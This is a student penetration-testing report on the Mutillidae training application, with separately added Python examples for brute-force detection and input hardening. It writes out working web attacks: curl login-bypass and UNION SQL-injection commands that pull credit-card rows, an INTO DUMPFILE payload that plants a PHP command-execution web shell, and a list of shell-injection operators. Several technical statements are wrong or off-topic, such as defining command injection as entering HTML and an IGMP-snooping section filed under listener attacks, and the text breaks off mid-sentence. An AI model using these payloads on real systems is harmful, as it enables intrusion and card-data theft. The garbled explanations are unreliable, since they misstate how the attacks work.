

MUTILLIDAE
PROJECT

SEPTEMBER 5, 2014

0 |Page

Table of Contents

INTRODUCTION
ATTACK VECTOR: BRUTE FORCE
  BRUTE FORCE
  DICTIONARY ATTACK
  BURP SUITE
  MUTILLIDAE EXAMPLE
ATTACK VECTOR: COMMAND EXECUTION INJECTION (HARVESTING)
  COMMAND EXECUTION INJECTION (HARVESTING)
  COMMAND EXECUTION
  COMMAND INJECTION ATTACK
  DATABASE INTERROGATION (DATA HARVESTING)
  MUTILLIDAE EXAMPLE
  HOW TO PERFORM SHELL AND COMMAND INJECTION ATTACKS
ATTACK VECTOR: COMMAND EXECUTION INJECTION (LISTENER ATTACKS)
  PURPOSE
ATTACK VECTOR: SQL INJECTION (SINGLE QUOTE PROBLEM)
  SQL INJECTION
  LOGIN WITHOUT A PASSWORD
  CURL
  MAN-IN-THE-MIDDLE ATTACK
  COOKIE MANAGER
  MUTILLIDAE EXAMPLE
ATTACK VECTOR: SQL INJECTION (UNION ATTACK DISPLAY SENSITIVE INFORMATION)
  UNION ATTACKS
  WEAK PHP PROGRAMMING
  MUTILLIDAE EXAMPLE
ATTACK VECTOR: SQL INJECTION (UNION ATTACK / CREATE COMMAND EXECUTION PROGRAM)
  COMMAND EXECUTION
  COMMAND EXECUTION LISTENER
  NETCAT
  MUTILLIDAE EXAMPLE
ATTACK VECTOR: SQL INJECTION (UNION ATTACK / CREATE UPLOAD PROGRAM)
  UNION ATTACK
  PHP UPLOAD BACKDOOR
  C99.PHP ROOT KIT
  MUTILLIDAE EXAMPLE
  COUNTER MEASURE
ATTACK VECTOR: FILE UPLOAD
  ATTACK UPLOAD VECTOR
  PAYLOAD
  CREATING A PAYLOAD
  EXECUTING A PAYLOAD
  CONNECTING A PAYLOAD BACK TO A MACHINE
  C99.PHP COMPARE AND CONTRAST
  C99.PHP MALICIOUS FUNCTIONALITY
  MUTILLIDAE EXAMPLE
  COUNTER MEASURE
ATTACK VECTOR: CROSS SITE SCRIPTING
  CROSS SITE SCRIPTING (XSS)
  REFLECTIVE CROSS SITE SCRIPTING
  PERSISTENT CROSS SITE SCRIPTING
  TESTING WEBPAGES FOR VULNERABILITY TO CROSS SITE SCRIPTING
  USING IFRAME TO POINT TO A MALICIOUS WEBSITE
  PLANTING A COOKIE HARVESTER INTO A BLOG TO GAIN A VICTIM'S COOKIE INFORMATION
  MUTILLIDAE EXAMPLE
  COUNTER MEASURE
CONCLUSION
  THE FUTURE OF ATTACK VECTORS AND GOING FORWARD COUNTER MEASURES
  JAVASCRIPTING AND CGI INPUT VALIDATION
  ONGOING SECURITY TESTING
PROJECT MEMBERS

Introduction

A penetration test is an attack on a computer system with the
intention of finding security weaknesses and potentially gaining
access to it, its functionality and its data. Mutillidae is a free,
open-source, deliberately vulnerable web application that provides a
target for web-security training. Mutillidae has over 35
vulnerabilities and challenges and contains at least one
vulnerability for each of the OWASP Top Ten for 2007 and 2010. Some
of the features include SSL stripping, bubble hints to help point
out vulnerable locations (bubble hints automatically give more
information as the hint level is incremented) and authentication
bypass. Mutillidae provides a data-capture page and stores captured
data in a database and in a file.

Mutillidae was created by Adrian Crenshaw as a web pen-testing
target for vulnerabilities. It began as version 1.x and was later
redesigned and developed into Mutillidae 2.x by Jeremy Druin.
Mutillidae was developed to aid in understanding and appreciating
the consequences of the vulnerabilities. It helps security
instructors avoid having to create custom web applications for
training, and it is useful for evaluating vendor products against a
target with specified, disclosed vulnerabilities. Vulnerabilities
need to be identified by both the penetration tester and the
vulnerability scanner. This allows the tester to find the
vulnerabilities and fix them before an attacker does. A few reasons
why penetration testing exists: it allows the tester to find holes
in a critical computer system before it goes online (which is good
security practice), and it gives the IT department at the targeted
company a chance to respond to an attack.


Attack Vector
Brute Force
Brute force (also known as brute force cracking) is a trial and error
method used by application programs to decode encrypted data
such as passwords or Data Encryption Standard (DES) keys,
through exhaustive effort (using brute force) rather than
employing intellectual strategies. It consists of systematically
checking all possible keys or passwords until the correct one is
found. In the worst case, this would involve traversing the entire
search space.
Dictionary Attack
A method used to break security systems, specifically
password-based security systems, in which the attacker
systematically tests all possible passwords, beginning with words
that have a higher
possibility of being used, such as names and places. The word
"dictionary" refers to the attacker exhausting all of the words in a
dictionary in an attempt to discover the password. Dictionary
attacks are typically done with software instead of an individual
manually trying each password.
Burp Suite
Burp Suite is an integrated platform for performing security
testing of web applications. Its various tools work seamlessly
together to support the entire testing process, from initial
mapping and analysis of an application's attack surface, through
to finding and exploiting security vulnerabilities.


Mutillidae Example:
A great majority of web applications provide a way for users to
authenticate themselves. If an attacker has knowledge of a user's
identity it's possible to create protected areas or, more generally,
to have the application behave differently upon the logon of
different users. In general, there are several methods for a user to
authenticate to a system. A dictionary file can be tuned and
compiled to cover words probably used by the owner of the
account that a malicious user is going to attack. Burp Suite will be
used to intercept traffic and will be configured to launch the
attack; using Burp Suite, the values of username and password can
be changed with each request.
After finding your target, open Mutillidae, then select View
Someone's Blog.

You will see a list of possible users; select Please Choose Author.


By right-clicking on the white background, you can view the page
source. <Ctrl> and <f> will allow you to search the source code.
Type admin, then press Enter.
You will then insert the IP of the target into the following
command, which parses the page source for the author list:

curl -L "http://xxx.xxx.xxx.xxx/mutillidae/index.php?page=view-someones-blog.php" 2>/dev/null \
  | grep -i \"admin\" \
  | sed 's/"//g' \
  | awk 'BEGIN{FS=">"}{for (i=1; i<=NF; i++) print $i}' \
  | grep -v value \
  | sed 's/<\/option//g'

Test login.php, then copy the login.php error.


Open a terminal and run gedit & to paste the error, then press
<Ctrl> and <v> to display the message.
From here, view login.php again and right-click the white
background to analyze the login.php source.
You will notice the naming convention of the username and
password fields and the value of the submit button.


From the Firefox dropdown, select Preferences, then Advanced,
Network, and Settings.

In Connection Settings, click Manual proxy configuration, type
"127.0.0.1" in the HTTP Proxy text box, type "8080" in the Port
text box, check Use this proxy server for all protocols, click OK,
then click Close.


Start Burp Suite: Applications --> BackTrack --> Vulnerability
Assessment --> Web Application Assessment --> Web Vulnerability
Scanner --> burpsuite.
Configure the proxy.

Turn on intercept.


Try Logging in and Verifying Burp Suite Results
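From the defender's side, the brute-force procedure above shows up as a burst of POST requests to login.php from one client. The following is an added example, not part of the original report and not Mutillidae's own code: it parses constructed Apache-style "combined" access-log lines and flags any client that posts to the login page at least a threshold number of times inside a sliding time window. The log format, login path, client addresses, threshold and window are all assumptions made for the demo.

```python
"""Flag password-guessing bursts against the login form in web-server access logs.

Added example (not from the report or from Mutillidae). Assumes the Apache/nginx
"combined" log format and that the login form posts to index.php?page=login.php;
the log lines, client addresses, threshold and window are constructed for the demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/mutillidae/index.php?page=login.php"
UA = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"  # UA string the report's curl uses

# Constructed sample log: 10.0.0.5 fires six login POSTs in six seconds and then a
# GET; 10.0.0.9 logs in once, like a normal user.
SAMPLE_LOG = "\n".join(
    ['10.0.0.5 - - [05/Sep/2014:10:00:%02d +0000] "POST %s HTTP/1.1" 200 4321 "-" "%s"'
     % (sec, LOGIN_PATH, UA) for sec in range(1, 7)]
    + ['10.0.0.5 - - [05/Sep/2014:10:00:09 +0000] "GET /mutillidae/index.php HTTP/1.1" 200 5120 "-" "%s"' % UA,
       '10.0.0.9 - - [05/Sep/2014:10:00:30 +0000] "POST %s HTTP/1.1" 302 0 "-" "Mozilla/5.0"' % LOGIN_PATH]
)

# Apache/nginx "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def login_bursts(lines, threshold=5, window_seconds=60):
    """Map client IP -> peak number of login POSTs seen inside any window of
    window_seconds, for every client whose peak reaches threshold."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            per_ip[rec["ip"]].append(rec["ts"])

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        peak, start = 0, 0
        for end in range(len(stamps)):
            # slide the left edge until the window fits, then measure it
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def detect_sample():
    """Run the detector over the constructed sample; returns {ip: peak}."""
    return login_bursts(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, peak in detect_sample().items():
        print("possible brute force from %s: %d login POSTs in one window" % (ip, peak))
```

The sliding window counts only POSTs to the login page, so ordinary browsing by the same client (the GET line) does not inflate the count, and a client with a single login attempt stays below the threshold. In practice the same logic runs on a log tail with the threshold tuned to the site's normal login rate; status codes could be added to count only failed attempts where the application returns a distinct code for them.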


Attack Vector
Command Execution Injection (Harvesting)

Command Execution
One of the most critical vulnerabilities that a penetration
tester can come across in a web application penetration test
is an application that allows them to execute system
commands.
Command Injection Attack
A command injection is an attack method in which a hacker
alters dynamically generated content on a Web page by
entering HTML code into an input mechanism, such as a
form field that lacks effective validation constraints. A
malevolent hacker (also known as a cracker) can exploit that
vulnerability to gain unauthorized access to data or network
resources. When users visit an affected Web page, their
browsers interpret the code, which may cause malicious
commands to execute in the users' computers and across
their networks.
Database Interrogation (Data Harvesting)
When you interrogate a customer database, you use the
software to ask carefully defined questions. The procedures
vary depending on your software, but the basic logic applies
to any database. Enter one or more items, called fields or
field names, and the values you want to output.
Mutillidae Example:


Shell injection, also known as command injection (the terms are
used interchangeably here), while not the most frequently talked
about or discovered vulnerability, is nonetheless one of the most
critical.
Oftentimes, web applications need to take advantage of
underlying programs or applications to complete some
functionality. This may be as simple as sending an email using the
UNIX sendmail program, or as complicated as running custom Perl
and C++ programs. From a development point of view, this is an
excellent way to reduce the development time of an application.
However, if data is passed to these programs via a user interface,
then an attacker may be able to inject shell commands into these
backend programs, potentially leading to compromise.
To understand how the most basic shell injection might work,
imagine a simple case. A custom script is needed to display file
contents to users, but the development team doesn't want to
spend time writing a procedure to read the files. Instead, they
decide to allow users to specify a file, then use the UNIX command
cat to display the results. The code to accomplish this might be
something like this in PHP:
<?php
echo shell_exec('cat '.$_GET['filename']);
?>
So far, so good. Now the script can be called with various GET
parameters to output different files to the user. If we add new files
to the directory, the application automatically knows how to read
and output them, whatever they contain. We can see this with a
simple example of how the program should work.
Assume we have a file in the same directory which a user may
want to output. Let's call it my_great_content.txt. It contains some
test text like the following:


A user comes to the page with the following URL:

The PHP page shows them the content just as the user expected.
For your average user, the page works as expected, and the
development team only had to write one line of code.
Unfortunately, as you may have guessed, the code is not secure
and is vulnerable to a shell command injection attack. An
attacker may append a semicolon (;) and another UNIX command to
the filename specified in the URL parameter. Perhaps they want to
start by listing what files are in the directory:

The page still comes up with the file contents, but since I injected
a command (ls), it doesn't end there. The command line continues
to execute the following command and shows some special
information.
This example code actually offers numerous opportunities for an
attacker, including directory traversal. As a quick example,
providing a file name like ../../etc/passwd would have the cat
command print out the list of users on the server. Even if shell
injection were prevented by limiting input to the cat function, this
issue would still need to be addressed.
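A hardened version of that one-line viewer, written here in Python as an added example (it is not the report's code and not a fix that Mutillidae ships): the file name is checked against an allowlist, then canonicalised and confined to a single content directory, and cat is run with an argument list rather than through a shell. That closes both problems the text raises, the appended ; ls and the ../../etc/passwd traversal, independently of each other. The content directory, the file, the allowlist pattern and the probe inputs are assumptions constructed for the demo.

```python
"""Hardened file viewer: the 'cat' example above with the injection and traversal closed.

Added example (not from the report or from Mutillidae). Assumes all viewable files
sit in one content directory; the directory, file and inputs are constructed here.
"""
import os
import re
import subprocess
import tempfile

# Allowlist for names: letters, digits, underscore, dot, dash, at most 64 chars,
# and the first char may not be a dot, so "..", ".htaccess" and anything carrying
# ; | & $ ` < > or / is refused before any path or process work happens.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")


def safe_cat(content_dir, filename):
    """Return the text of content_dir/filename, or raise ValueError for an unsafe name."""
    if not SAFE_NAME.match(filename):
        raise ValueError("filename contains disallowed characters")
    # Canonicalise and confine: even if the allowlist were loosened later, a
    # resolved path outside content_dir (symlink, ../) is still refused.
    base = os.path.realpath(content_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.dirname(target) != base:
        raise ValueError("path escapes the content directory")
    # argv list and no shell=True: the name is exactly one argument to cat and
    # is never parsed for ; | $( ) or redirection by a shell.
    try:
        done = subprocess.run(["cat", target], capture_output=True, text=True, check=True)
    except subprocess.CalledProcessError:
        raise FileNotFoundError(filename) from None
    return done.stdout


def _is_refused(content_dir, name):
    try:
        safe_cat(content_dir, name)
    except ValueError:
        return True
    return False


def demo():
    """Serve the legitimate file, then list which of the injection-style inputs are refused."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "my_great_content.txt"), "w") as f:
            f.write("hello from my_great_content.txt\n")
        served = safe_cat(d, "my_great_content.txt")
        attempts = ["my_great_content.txt; ls", "../../etc/passwd",
                    "< my_great_content.txt", "$(id)", "my_great_content.txt | id"]
        refused = [a for a in attempts if _is_refused(d, a)]
    return served, refused


if __name__ == "__main__":
    content, blocked = demo()
    print(content, end="")
    print("refused:", blocked)
```

The three layers are deliberately redundant: the allowlist alone stops every input in the demo, the realpath check covers names that pass a looser allowlist, and the argv call means that even a metacharacter that slipped through would be a literal part of a file name, not a command separator.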
How to Perform Shell and Command Injection Attacks
Assuming some analysis has found a website function which is
likely to be vulnerable to shell injection, there are a variety of ways
to inject shell commands.
Assume for a moment that you have found the previous example's
page, which takes a filename as input and executes the shell
command "cat" against that file. In the previous example, a
semicolon was used to separate one command from another, to
indicate that after the cat command completed, another function
should be called on the same line. It is reasonable to assume that
a more advanced developer might have filtered out some forms of
shell injection, such as by removing semicolons, rendering the
previous attack ineffective. There are a number of ways to string
shell commands together to create new commands. Here are the
common operators, as well as examples of how they might be used
in an attack:
Redirection Operators
Examples: <, >>, >
These operators redirect either input or output somewhere else on
the server. < will make whatever comes after it standard input.
Replacing the filename with < filename will not change the output,
but could be used to avoid some filters. > redirects command
output, and can be used to modify files on the server, or create
new ones altogether. Combined with the cat command, it could
easily be used to add UNIX users to the system, or deface the
website. Finally, >> appends text to a file and is not much
different from the original output modifier, but again can be used
to avoid some simplistic detection schemes.
Pipes
Examples: |
Pipes allow the user to chain multiple commands. It will redirect
the output of one command into the next. So you can run
unlimited commands by chaining them with multiple pipes, such
as cat file1 | grep "string".
Inline commands
Examples: ;, $
This is the original example. Putting a semicolon asks the
command line to execute everything before the semicolon, then
execute everything else as if on a fresh command line.
Logical Operators
Examples: $, &&, ||

These operators perform some logical operation against the data
before and after them on the command line.
Common Injection Patterns & Results
Here are the expected results from a number of common injection
patterns (appending the below to a given input string, assuming
all quotes are correctly paired):
`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command - executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the output of the previous command to the target file
< target_file - sends the contents of target_file to the previous command
- operator - adds additional operations to the target command
These examples are only scratching the surface of possible
command injection vectors. The full breadth of attack possibilities
is dependent upon the underlying function calls. For instance, if an
underlying function is using a shell program such as awk, many
more attack possibilities arise than laid out here.

Finally, command injection can be more subtle than finding
applications which directly call underlying operating system
functions. If it is possible to inject code, say PHP code, then you
can also perform command injections. Assume you find an
application with a PUT vulnerability on a site which is PHP enabled.
An attacker could simply upload a PHP file with a single line to
have full access to a shell:
<?php
echo shell_exec('cat '.$_GET['command']);
?>
Thus, it should be noted that many types of attacks, including SQL
injection, have shell injection as the primary end goal on the way
to gaining control of the server.

Attack Vector
Listener Attacks
IGMP snooping is the process of listening to Internet Group
Management Protocol (IGMP) network traffic. The feature allows a
network switch to listen in on the IGMP conversation between
hosts and routers. By listening to these conversations the switch
maintains a map of which links need which IP multicast streams.

Multicasts may be filtered from the links which do not need them,
thus controlling which ports receive specific multicast traffic.

Purpose
A switch will, by default, flood multicast traffic to all the ports in a
broadcast domain (or the VLAN equivalent). Multicast can cause
unnecessary load on host devices by requiring them to process
packets they have not solicited. When purposefully exploited this
is known as one variation of a denial-of-service attack. IGMP
snooping is designed to prevent hosts on a local network from
receiving traffic for a multicast group they have not explicitly
joined. It provides switches with a mechanism to prune multicast
traffic from links that do not contain a multicast listener (an IGMP
client).
IGMP snooping allows a switch to only forward multicast traffic to
the links that have solicited them. Essentially, IGMP snooping is a
layer 2 optimization for the layer 3 IGMP. IGMP snooping takes
place internally on switches and is not a protocol feature.
Snooping is therefore especially useful for bandwidth-intensive IP
multicast applications such as IPTV.


Attack Vector
SQL Injection (Single Quote Problem)

The Single Quote Problem is that the single quote is a reserved SQL
character that breaks the query below when it is placed in the Name
textbox.

The mere fact that the query produces an error means there is a
strong possibility that the backend program is susceptible to SQL
injection.

Logging in without a password by entering the string ' or 1=1--
(with a space after the --) allows you to bypass the password
authentication.


SQL Injection
SQL injection is a code injection technique, used to attack
data-driven applications, in which malicious SQL statements are
inserted into an entry field for execution. SQL injection must
exploit a security vulnerability in an application's software, for
example, when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user
input is not strongly typed and unexpectedly executed. SQL
injection is mostly known as an attack vector for websites but can
be used to attack any type of SQL database. The single quote
allows the attackers to get the information they are attempting to
acquire to be kicked back to them. You can test for this by
changing the password box to plain text and entering a single
quote into the password box to see what errors you obtain.
Depending on what happens will determine how you can exploit
the situation. A straightforward, though error-prone, way to
prevent injections is to escape characters that have a special
meaning in SQL. The manual for an SQL DBMS explains which
characters have a special meaning, which allows creating a
comprehensive blacklist of characters that need translation. For
instance, every occurrence of a single quote (') in a parameter
must be replaced by two single quotes ('') to form a valid SQL
string literal.
SQL injection (also known as SQL fishing) is a technique often
used to attack data-driven applications. This is done by including
portions of SQL statements in an entry field in an attempt to get
the website to pass a newly formed rogue SQL command to the
database (e.g., dump the database contents to the attacker). SQL
injection is a code injection technique that exploits a security
vulnerability in an application's software. The vulnerability
happens when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user
input is not strongly typed and unexpectedly executed. SQL
injection is mostly known as an attack vector for websites but can
be used to attack any type of SQL database.
cURL
cURL stands for "Client URL Request Library". This is a command-line
tool for getting or sending files using URL syntax. It supports a
range of common Internet protocols, currently including HTTP,
HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET,
FILE, IMAP, POP3, SMTP and RTSP. The following curl statement
provides the blueprint to automate SQL injection attempts:

curl -b crack_cookies.txt -c crack_cookies.txt \
  --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" \
  --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login" \
  --location "http://xxx.xxx.xxx.xxx/mutillidae/index.php?page=login.php" > login1.txt
Man-in-the-middle attack
The man-in-the-middle attack in cryptography and computer
security is a form of active eavesdropping in which the attacker
makes independent connections with the victims and relays
messages between them, making them believe that they are
talking directly to each other over a private connection, when in
fact the entire conversation is controlled by the attacker. The
attacker must be able to intercept all messages going between
the two victims and inject new ones, which is straightforward in
many circumstances.
Cookies Manager
Cookies Manager is a tool to view, edit and create new cookies. It
also shows extra information about cookies, allows editing
multiple cookies at once, and can back them up and restore them.
When Burp Suite is used as a proxy server and a web browser uses
this proxy, it is possible to control all traffic exchanged between
the web browser and web servers.
Mutillidae Example
Burp makes it possible to manipulate data before it is sent to the
web server.
This curl statement provides the blueprint to automate SQL
injection attempts:

curl -b crack_cookies.txt -c crack_cookies.txt \
  --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" \
  --data "username=%27+or+1%3D1--+&password=&login-php-submit-button=Login" \
  --location "http://xxx.xxx.xxx.xxx/mutillidae/index.php?page=login.php" > login1.txt

The crack_cookies.txt file contains the session cookies, including
the PHP session ID (PHPSESSID) and the UID of the user admin.
What is happening is that Burp Suite is obtaining the information
from someone's session by acting as a proxy server and
intercepting the traffic going into the website before it reaches its
destination, and kicks the information back to the hacker. Passing
the SQL injection to cURL allows you to obtain login information of
users and access the website as those users. The attack outputs
the session information obtained by the cookie manager into text
files that can be obtained by the hacker. This information can be
used to access websites as the user without the user's knowledge.
Some countermeasures for SQL injection would be: use
language-specific libraries that avoid problems due to shell
commands; validate the data provided to prevent any malicious
content; structure requests so that all supplied parameters are
treated as data rather than potentially executable content; and
use J2EE environments to allow the use of the Java sandbox, which
can prevent the execution of system commands. Some
countermeasures for cookie managers would be: do not store
plain-text or weakly encrypted passwords in a cookie; implement
cookie timeouts; associate cookie authentication credentials with
an IP address; and make logout functions available.

Attack Vector
SQL Injection (Union Attack Display Sensitive
Information)
A SQL UNION attack, when added to an existing statement, is used
to retrieve information from the specified table. It also combines
results from multiple statements into one result set. In my
research I have found that PHP programming is considered weak
programming because it has many interchangeable integers and
strings. This makes it weak because it means that there are very
few rules, and that in turn leaves it open to more possible and
easier attacks.
Union Attack
An attacker can use a union attack to display the database table
structure by inputting union select null as many times as
needed to discover exactly how many columns are in the
database. This is a useful tool because it then becomes easier to
know exactly where to look for the information you are requesting.
A countermeasure that can be used to combat this type of inquiry
would, in my opinion, be making sure that there are extensive
system logs in place. I also feel that implicit deny would be
effective because it blocks any traffic that is not specifically
accepted.
Weak PHP Programming
PHP uses strings and integers interchangeably, so there are fewer
rules. Therefore, PHP is considered a weakly typed language. PHP
is also dynamically typed because the rules are applied at run
time instead of at compile time since PHP is not compiled and
instead interpreted at run time.
Mutillidae Example
An attacker can use the union attack to display sensitive
information by inputting:

union select ccid,ccnumber,ccv,expiration,null from credit_cards --

This will take the requested information and insert it into the
results page. A good countermeasure for this type of attack would
be the use of stored procedures. This would force the injection to
go through a script that can then deny the attacker access.
By inputting

curl -b crack_cookies.txt -c crack_cookies.txt \
  --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" \
  --data "page=user-info.php&username=%27+union+select+ccid%2Cccnumber%2Cccv%2Cexpiration%2Cnull+from+credit_cards+--+&password=&user-info-php-submit-button=View+Account+Details" \
  --location "http://xxx.xxx.xxx.xxx/mutillidae/index.php" \
  | grep -i "Username=" \
  | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}' \
  | awk -F\> '{print $2}'

the selected data from the union attack is easily viewed with cURL.
I believe that the most effective procedure for this would also be a
stored procedure. With a stored procedure the attacker would have
trouble even getting to this point, let alone going any further to
retrieve this information.
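The three inputs this report sends to the login and user-info pages (a lone single quote, ' or 1=1-- , and the five-column UNION SELECT on credit_cards) are run here against a query built by string concatenation and against the same query with bound parameters, which is the countermeasure the report's "treat all supplied parameters as data" advice points at. This is an added example, not code from the report or from Mutillidae: it uses an in-memory SQLite database with constructed tables and rows (Mutillidae itself runs on MySQL), and the table and column names are assumptions shaped only so the report's five-column payload fits. The point is the contrast: the concatenated query errors on the quote, returns every account for the 1=1 payload and hands the credit_cards rows to the UNION, while the parameterised query finds no matching user in all three cases.

```python
"""The report's single-quote, login-bypass and UNION inputs against a concatenated
query and against a parameterised one.

Added example (not from the report or from Mutillidae). Tables, rows and column
names are constructed for an in-memory SQLite database; Mutillidae uses MySQL.
"""
import sqlite3

# Payloads exactly as the report gives them (the trailing space after -- matters).
LOGIN_PAYLOAD = "' or 1=1-- "
UNION_PAYLOAD = "' union select ccid,ccnumber,ccv,expiration,null from credit_cards -- "


def build_db():
    """Constructed stand-ins for an accounts table and a credit_cards table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE accounts (cid INTEGER, username TEXT, password TEXT,
                               mysignature TEXT, is_admin TEXT);
        CREATE TABLE credit_cards (ccid INTEGER, ccnumber TEXT, ccv TEXT, expiration TEXT);
        INSERT INTO accounts VALUES (1, 'admin', 'adminpass', 'g0t r00t?', 'TRUE');
        INSERT INTO accounts VALUES (2, 'alice', 'alicepass', 'hello', 'FALSE');
        INSERT INTO credit_cards VALUES (1, '4444111122223333', '745', '2012-03-01');
    """)
    return con


def login_unsafe(con, username, password):
    """Query assembled by string formatting: a quote in the input ends the literal
    and whatever follows is parsed as SQL."""
    sql = ("SELECT username FROM accounts WHERE username='%s' AND password='%s'"
           % (username, password))
    return con.execute(sql).fetchall()


def login_safe(con, username, password):
    """Same query with placeholders: the driver binds the input as a value, so
    quotes, comments and UNION keywords never reach the parser as SQL."""
    sql = "SELECT username FROM accounts WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchall()


def single_quote_probe(con, safe):
    """Send a lone single quote; return the database error text, or None if no error.
    An error here is the 'single quote problem' signal the report describes."""
    try:
        (login_safe if safe else login_unsafe)(con, "'", "")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


def user_info_unsafe(con, username):
    """Five-column lookup built by concatenation, the shape the UNION payload targets."""
    sql = ("SELECT cid, username, password, mysignature, is_admin "
           "FROM accounts WHERE username='%s'" % username)
    return con.execute(sql).fetchall()


def user_info_safe(con, username):
    sql = ("SELECT cid, username, password, mysignature, is_admin "
           "FROM accounts WHERE username=?")
    return con.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("quote, concatenated :", single_quote_probe(db, safe=False))
    print("quote, parameterised:", single_quote_probe(db, safe=True))
    print("1=1, concatenated   :", login_unsafe(db, LOGIN_PAYLOAD, ""))
    print("1=1, parameterised  :", login_safe(db, LOGIN_PAYLOAD, ""))
    print("union, concatenated :", user_info_unsafe(db, UNION_PAYLOAD))
    print("union, parameterised:", user_info_safe(db, UNION_PAYLOAD))
```

Nothing about the parameterised functions is specific to SQLite; MySQL drivers for PHP (mysqli and PDO prepared statements) bind values the same way, which is why escaping single quotes by hand, the error-prone approach the report mentions, is not needed once every user-supplied value travels as a bound parameter.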

Attack Vector
SQL Injection (Union Attack / Create Command
Execution Program)
Union Attack
A SQL UNION attack, as explained above, when added to an
existing statement is used to retrieve information from the
specified table. It also combines results from multiple statements
into one result set.
Command Execution
Command execution takes commands and uses those commands to
dump files and information into separate files.
Command Execution Listener
A command execution listener is a listener for the execution of
commands. This listener will be notified if a command is about to
execute, and when that execution completes. It is not possible for
the listener to prevent the execution, only to respond to it in some
way.
Netcat
Netcat is designed to be a dependable back-end that can be used
directly or easily driven by other programs and scripts.
Mutillidae Example
By inputting

' union select null,null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form><?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?>' INTO DUMPFILE '/var/www/html/mutillidae/execute_command.php'

the attacker can create a PHP command execution program. Once
again I feel a stored procedure would be the best countermeasure.
The reason I feel this would be effective is that there would be an
active log of all login attempts.
By inputting

select * from accounts where username RLIKE '^[0-9]' union select ccid,ccnumber,ccv,expiration,null from credit_cards INTO OUTFILE '/tmp/CCN.csv' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n';

and then inputting \! cat /tmp/CCN.csv you will take all of the
information and dump it into a separate file. As far as a good
countermeasure, I really am unsure what would be the most
effective countermeasure for this type of attack.

Attack Vector
SQL Injection (Union Attack / Create Upload Program)

Union Attack
Union attack is a specific flavor of SQL injection. It is arguably the
most destructive and allows the attacker to extract extremely large
chunks of data in a very short amount of time. Union attacks are
very quick and require very few requests, making it more difficult
to detect abnormal activity.
PHP Upload Backdoor
The PHP upload backdoor shell is a malicious piece of code that
can be uploaded to a site to gain access to files stored on that
site. Once it is uploaded, the hacker can use it to edit, delete, or
download any files on the site, or upload their own.
C99.php Root Kit
The c99.php utility is a type of web front-end backdoor/rootkit that
allows anybody to do the following: list files and directories;
search files and directories with regular expressions; execute shell
commands; brute-force FTP passwords; establish netcat sessions;
perform database reconnaissance and modification; and much
more.
Mutillidae Example
Identifying the SQL injection is the key step, and it takes a lot of
skill and experience to identify the injection point. By analyzing
the application properly, the possible injection points can be
identified. As in the screenshot shown below, the USER ID field
could be vulnerable to SQL injection. It takes an integer as input
and displays the first name and surname associated with the User
ID provided. MySQL helps to explore the SQL injection further.
Let's dig further and try to enumerate, to guess the backend
query, the number of columns used in the query, the database
name, the MySQL version, etc. Our guess about the backend query
from the front end is something like:

MySQL> select first name, last name from users where user_id=1 ;

But it is just a wild guess. We'll need proper enumeration of the
backend query, for which MySQL helps us. MySQL gives us ORDER
BY. UNION combines the results of 2 SELECT queries. From our
previous ORDER BY operation we know that the query contains 2
columns. So one SELECT query is the backend query, over which we
have no control, but we can introduce UNION with another SELECT
query designed by us, and the application will display the union of
the results of the 2 queries. The final query at the backend would
be something like this after our injection using UNION SELECT.
Make sure, since the main query uses 2 columns, that the UNION
SELECT also uses exactly 2 columns, because both SELECT queries
must have the same number of columns:

MySQL> select first name, last name from users where user_id= union select 1,2
Counter Measures:
Countermeasures for union attacks, PHP upload backdoors, and
c99.php root kits are to implement secure coding; to deploy a
combination of network, host, and application intrusion detection
systems to monitor for attacks; to use firewalls to block attacks;
and to probe for vulnerabilities.

Attack Vector
File Upload
Attack Vector
An upload attack vector exists when a web application provides
the ability to upload files. An attack vector is the approach used
to assault a computer system or network. A fancy way of saying
"method or type of attack", the term may refer to a variety of
vulnerabilities. For example, an operating system or web browser
may have a flaw that is exploited by a website. Human
shortcomings are also used to engineer attack vectors. For
